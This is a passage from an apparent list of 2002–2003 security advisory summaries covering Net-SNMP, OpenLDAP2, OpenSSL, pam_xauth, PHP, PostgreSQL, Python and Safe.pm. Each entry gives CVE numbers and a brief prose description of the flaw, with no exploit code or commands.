CVE #(s): | CAN-2002-1170
|
| Created: | December 17, 2002 |
Updated: | November 7, 2003 |
| Description: |
The SNMP daemon included in the Net-SNMP package versions 5.0.1 through
5.0.4 can be caused to crash if it is sent a specially crafted packet. |
| Alerts: |
|
Comments (none posted)
OpenLDAP2: remote command execution
| Package(s): | OpenLDAP2 |
CVE #(s): | CAN-2002-1378
CAN-2002-1379
|
| Created: | December 6, 2002 |
Updated: | February 21, 2003 |
| Description: |
OpenLDAP is the Open Source implementation of the Lightweight Directory
Access Protocol (LDAP) and is used in network environments for distributing
certain information such as X.509 certificates or login information.
The SuSE Security Team reviewed critical parts of that package and found
several buffer overflows and other bugs remote attackers could exploit to
gain access on systems running vulnerable LDAP servers. In addition to
these bugs, various local exploitable bugs within the OpenLDAP2 libraries
(openldap2-devel package) have been fixed.
Since there is no workaround possible except shutting down the LDAP server,
an update is strongly recommended. |
| Alerts: |
|
Comments (1 posted)
OpenSSL: plaintext exposure vulnerability
| Package(s): | openssl |
CVE #(s): | CAN-2003-0078
|
| Created: | February 19, 2003 |
Updated: | March 6, 2003 |
| Description: |
A vulnerability has been found in OpenSSL that, given the right conditions,
could lead to the exposure of transactions in plain text. This problem
looks difficult to exploit (it requires a man-in-the-middle attack, among
other things), but one can't be too sure, so the OpenSSL project has
released versions 0.9.7a (with the fix and some new features) and 0.9.6i
(with fixes only). See the announcement for details. |
| Alerts: |
|
Comments (none posted)
pam_xauth: root exploit
| Package(s): | pam_xauth |
CVE #(s): | CAN-2002-1160
|
| Created: | February 13, 2003 |
Updated: | July 10, 2003 |
| Description: |
The pam_xauth module is used to forward xauth information from user to user
in applications such as 'su'.
Andreas Beck discovered that versions of pam_xauth supplied with Red Hat
Linux since version 7.1 would forward authorization information from the
root account to unprivileged users. This could be used by a local attacker
to gain access to an administrator's X session. In order to exploit this
vulnerability, the attacker would have to get the administrator, as root,
to use su to the account belonging to the attacker. |
| Alerts: |
|
Comments (none posted)
PHP: vulnerability in mail function
| Package(s): | php |
CVE #(s): | CAN-2002-0985
CAN-2002-0986
|
| Created: | November 13, 2002 |
Updated: | September 30, 2003 |
| Description: |
Two vulnerabilities exists in the mail() PHP function. The first one allows
the execution of any program/script bypassing safe_mode restriction, the
second one may give an open-relay script if the mail() function is not
carefully used in PHP scripts. See this Bugtraq
report for more details. Note that this is a different vulnerability than the previous PHP mail() problem, which affected versions through 4.1.0.
CAN-2002-0985
CAN-2002-0986 |
| Alerts: |
|
Comments (none posted)
php: arbitrary file access and code execution
| Package(s): | php, mod_php |
CVE #(s): | |
| Created: | February 18, 2003 |
Updated: | February 19, 2003 |
| Description: |
Kosmas Skiadopoulos discovered a serious security vulnerability [0] in the
CGI SAPI of PHP version 4.3.0. PHP [1] contains code for preventing direct
access to the CGI binary with configure option
"--enable-force-cgi-redirect" and php.ini option "cgi.force_redirect". In
PHP 4.3.0 there is a bug which renders these options useless. Please note
that this bug does NOT affect any of the other SAPI modules such as the
Apache or ISAPI modules.
Anyone with access to websites hosted on a web server which employs the CGI
module may exploit this vulnerability to gain access to any file readable
by the user under which the webserver runs. A remote attacker could also
trick PHP into executing arbitrary PHP code if attacker is able to inject
the code into files accessible by the CGI. This could be for example the
web server access-logs.
References:
[0]
http://www.php.net/release_4_3_1.php
[1] http://www.php.net/ |
| Alerts: |
|
Comments (none posted)
PostgreSQL - more buffer overflows
| Package(s): | postgresql |
CVE #(s): | |
| Created: | February 12, 2003 |
Updated: | November 7, 2003 |
| Description: |
A new set of buffer overflows has been discovered in PostgreSQL 7.2.2; they affect the circle_poly(), path_encode(), and path_addr() functions. Exploiting these overflows requires that the attacker first obtain a connection to the PostgreSQL server. |
| Alerts: |
|
Comments (1 posted)
Local arbitrary code execution vulnerability in Python
| Package(s): | python |
CVE #(s): | CAN-2002-1119
|
| Created: | August 28, 2002 |
Updated: | September 30, 2003 |
| Description: |
Zack Weinberg discovered that
os._execvpe from os.py uses a predictable name which could lead
to execution of arbitrary code. According to the Debian
advisory, the problem
was present in Python versions 1.5, 2.1 and 2.2.
CAN-2002-1119 |
| Alerts: |
|
Comments (none posted)
Multiple-use vulnerability in Safe.pm
| Package(s): | Safe.pm |
CVE #(s): | CAN-2002-1323
|
| Created: | October 9, 2002 |
Updated: | February 20, 2004 |
| Description: |
usePerl has a
description |
